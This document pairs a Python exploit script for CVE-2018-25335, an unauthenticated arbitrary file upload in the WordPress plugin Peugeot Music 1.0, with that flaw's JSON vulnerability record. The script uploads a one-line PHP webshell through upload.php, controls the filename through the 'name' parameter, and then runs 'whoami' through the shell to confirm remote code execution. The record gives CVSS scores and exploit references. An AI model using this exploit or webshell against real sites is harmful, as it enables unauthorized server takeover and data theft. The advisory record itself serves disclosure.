CVE-2018-25335

import requests # Target URL configuration target_url = "http://example.com/wp-content/plugins/peugeot-music/upload.php" shell_url = "http://example.com/wp-content/uploads/shell.php" # Malicious file content (PHP webshell) php_code = "<?php system($_GET['cmd']); ?>" # Prepare the files and data for the upload request # The vulnerability allows bypassing extension checks via the 'name' parameter files = { 'file': ('shell.php', php_code, 'application/octet-stream') } data = { 'name': 'shell.php' # Critical parameter to control the uploaded filename } try: response = requests.post(target_url, files=files, data=data) if response.status_code == 200: print("[+] File uploaded successfully.") # Attempt to execute the uploaded shell verify = requests.get(shell_url + "?cmd=whoami") if verify.status_code == 200: print(f"[+] Code execution successful! Output: {verify.text}") else: print("[-] Upload likely succeeded, but execution failed.") else: print(f"[-] Upload failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2018-25335", "sourceIdentifier": "[email protected]", "published": "2026-05-17T13:16:45.220", "lastModified": "2026-05-18T17:05:46.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WordPress Plugin Peugeot Music 1.0 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by sending POST requests to the upload.php endpoint. Attackers can upload files with arbitrary extensions by manipulating the 'name' parameter to execute code from the uploads directory."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44737", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-peugeot-music-arbitrary-file-upload", "source": "[email protected]"}]}}